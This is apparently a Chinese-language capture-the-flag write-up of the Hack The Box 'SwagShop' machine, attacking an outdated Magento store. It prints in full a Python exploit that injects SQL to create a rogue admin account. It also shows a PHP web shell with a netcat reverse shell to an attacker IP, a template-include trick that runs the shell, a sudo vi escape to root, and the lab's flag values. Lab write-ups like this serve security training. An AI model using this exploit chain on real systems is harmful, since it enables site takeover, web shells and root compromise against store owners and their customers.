Hackthebox - SwagShop
靶场信息
靶场类型
信息收集
Nmap
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 10000 10.10.10.140
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-17 02:26 CST
Warning: 10.10.10.140 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.140
Host is up (0.078s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b6552bd24e8fa3817261379a12f624ec (RSA)
| 256 2e30007a92f0893059c17756ad51c0ba (ECDSA)
|_ 256 4c50d5f270c5fdc4b2f0bc4220326434 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Did not follow redirect to http://swagshop.htb/
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=2/17%OT=22%CT=1%CU=30863%PV=Y%DS=2%DC=T%G=Y%TM=63EE758
OS:B%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=108%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M537ST11NW7%O2=M537ST11NW7%O3=M537NNT11NW7%O4=M537ST11NW7%O5=M537ST1
OS:1NW7%O6=M537ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M537NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 993/tcp)
HOP RTT ADDRESS
1 117.05 ms 10.10.16.1
2 76.51 ms 10.10.10.140
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.68 seconds
Http
这边 http 会跳转到域名 swagshop.htb
,去加入一个 hosts 解析
echo 10.10.10.140 swagshop.htb >> /etc/hosts
似乎是一个商城,底部可以发现这是 2014 年版本的 Magento
去搜索一下是否有漏洞
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit magento
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection | php/webapps/38573.txt
eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execution / Denial of Service) | php/webapps/38651.txt
Magento 1.2 - '/app/code/core/Mage/Admin/Model/Session.php?login['Username']' Cross-Site Scripting | php/webapps/32808.txt
Magento 1.2 - '/app/code/core/Mage/Adminhtml/controllers/IndexController.php?email' Cross-Site Scripting | php/webapps/32809.txt
Magento 1.2 - 'downloader/index.php' Cross-Site Scripting | php/webapps/32810.txt
Magento < 2.0.6 - Arbitrary Unserialize / Arbitrary Write File | php/webapps/39838.php
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution | php/webapps/37811.py
Magento eCommerce - Local File Disclosure | php/webapps/19793.txt
Magento eCommerce - Remote Code Execution | xml/webapps/37977.py
Magento eCommerce CE v2.3.5-p2 - Blind SQLi | php/webapps/50896.txt
Magento Server MAGMI Plugin - Multiple Vulnerabilities | php/webapps/35996.txt
Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion | php/webapps/35052.txt
Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass | php/webapps/48135.php
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
这边发现有一个 RCE 的漏洞
漏洞利用
拷贝到本地后去查看一下
import requests
import base64
import sys
target = "http://target.com/"
if not target.startswith("http"):
target = "http://" + target
if target.endswith("/"):
target = target[:-1]
target_url = target + "/admin/Cms_Wysiwyg/directive/index/"
q="""
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""
query = q.replace("\n", "").format(username="forme", password="forme")
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
r = requests.post(target_url,
data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
"filter": base64.b64encode(pfilter),
"forwarded": 1})
if r.ok:
print "WORKED"
print "Check {0}/admin with creds forme:forme".format(target)
else:
print "DID NOT WORK"
import requests
import base64
import sys
target = "http://swagshop.htb/index.php"
if not target.startswith("http"):
target = "http://" + target
if target.endswith("/"):
target = target[:-1]
target_url = target + "/admin/Cms_Wysiwyg/directive/index/"
q="""
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""
query = q.replace("\n", "").format(username="lucifiel", password="lucifiel")
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
r = requests.post(target_url,
data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
"filter": base64.b64encode(pfilter),
"forwarded": 1})
if r.ok:
print "WORKED"
print "Check {0}/admin with creds lucifiel:lucifiel".format(target)
else:
print "DID NOT WORK"
根据我们需要的进行修改,将第五行的地址更改为 http://swagshop.htb/index.php
,将第二十四行的账号密码更改为我们需要的账号密码
┌──(root㉿kali)-[~/Desktop]
└─# python2 exploit.py
WORKED
Check http://swagshop.htb/index.php/admin with creds lucifiel:lucifiel
然后去进行登录
成功登录
https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper
通过翻找,找到了一篇漏洞相关的文档
这里依次点击 System –> Configuration –> Advanced –> Developer –> Template Settings –> Allow Symlinks
然后将它设置为 yes,然后点击 save config 保存
接着制作图片马
echo '<?php' >> shell.php.png
echo 'passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.7 4444 >/tmp/f");'>> shell.php.png
echo '?>' >> shell.php.png
然后再依次点击 Catalog -> Manager Categories 进行上传
然后去查看,会发现我们的图片已经传上去了
最后一步是创建通讯模板兵注入我们的 payload
点击 Newsletter -> Newsletter Templates -> Add New Template
{{block type='core/template' template='../../../../../../media/catalog/category/shell.php.png'}}
这是我们要填入的内容
然后使用 nc 监听一个端口
最后我们点击 Preview Template 预览模板
┌──(root㉿kali)-[~/Desktop]
└─# rlwrap nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.140] 33206
/bin/sh: 0: can't access tty; job control turned off
$ whoami&&id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
得到了一个 shell
python3 -c "import pty;pty.spawn('/bin/bash')";
权限提升
$ sudo -l
Matching Defaults entries for www-data on swagshop:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on swagshop:
(root) NOPASSWD: /usr/bin/vi /var/www/html/*
我们可以使用 root 权限调用 /sur/bin/vi 执行所有 /var/www/html/* 的文件
$ ls -la /var/www/html/
total 720
drwxr-xr-x 12 www-data www-data 4096 Nov 12 2021 .
drwxr-xr-x 3 root root 4096 Nov 12 2021 ..
-rw-r--r-- 1 www-data www-data 5667 May 7 2014 .htaccess
-rw-r--r-- 1 www-data www-data 4568 May 7 2014 .htaccess.sample
-rw-r--r-- 1 www-data www-data 10679 May 7 2014 LICENSE.html
-rw-r--r-- 1 www-data www-data 10410 May 7 2014 LICENSE.txt
-rw-r--r-- 1 www-data www-data 10421 May 7 2014 LICENSE_AFL.txt
-rw-r--r-- 1 www-data www-data 585086 May 7 2014 RELEASE_NOTES.txt
-rw-r--r-- 1 www-data www-data 2834 May 7 2014 api.php
drwxr-xr-x 6 www-data www-data 4096 Nov 12 2021 app
-rw-r--r-- 1 www-data www-data 2831 May 7 2014 cron.php
-rw-r--r-- 1 www-data www-data 717 May 7 2014 cron.sh
drwxr-xr-x 3 www-data www-data 4096 Nov 12 2021 errors
-rw-r--r-- 1 www-data www-data 1150 May 7 2014 favicon.ico
-rw-r--r-- 1 www-data www-data 5979 May 7 2014 get.php
drwxr-xr-x 2 www-data www-data 4096 Nov 12 2021 includes
-rw-r--r-- 1 www-data www-data 2642 May 7 2014 index.php
-rw-r--r-- 1 www-data www-data 2366 May 7 2014 index.php.sample
-rw-r--r-- 1 www-data www-data 6441 May 7 2014 install.php
drwxr-xr-x 12 www-data www-data 4096 Nov 12 2021 js
drwxr-xr-x 13 www-data www-data 4096 Nov 12 2021 lib
-rw-r--r-- 1 www-data www-data 1319 May 7 2014 mage
drwxrwxrwx 8 www-data www-data 4096 Nov 12 2021 media
-rw-r--r-- 1 www-data www-data 886 May 7 2014 php.ini.sample
drwxr-xr-x 2 www-data www-data 4096 Nov 12 2021 pkginfo
drwxr-xr-x 2 www-data www-data 4096 Nov 12 2021 shell
drwxr-xr-x 5 www-data www-data 4096 Nov 12 2021 skin
drwxr-xr-x 10 www-data www-data 4096 Feb 16 13:54 var
我们可以看到,/var/www/html/
目录下的东西还是挺多的
根据 GTFOBins
上的提示,我们在 vi 编辑中,使用 :shell 即可获得权限
那我们去随便执行一个吧
sudo /usr/bin/vi /var/www/html/index.php
执行后按 ESC,然后输入 :shell
即可
root@swagshop:/var/www/html# whoami&&id
whoami&&id
root
uid=0(root) gid=0(root) groups=0(root)
成功提权到 root 权限
root@swagshop:/var/www/html# cat /home/haris/user.txt
cat /home/haris/user.txt
370cc7d01561ab4da02e53de7ef8d799
成功拿到 user 权限的 flag 文件
root@swagshop:/var/www/html# cat /root/root.txt
cat /root/root.txt
295e684ef53b47af9e6fc69a3301ee26
成功拿到 root 权限的 flag 文件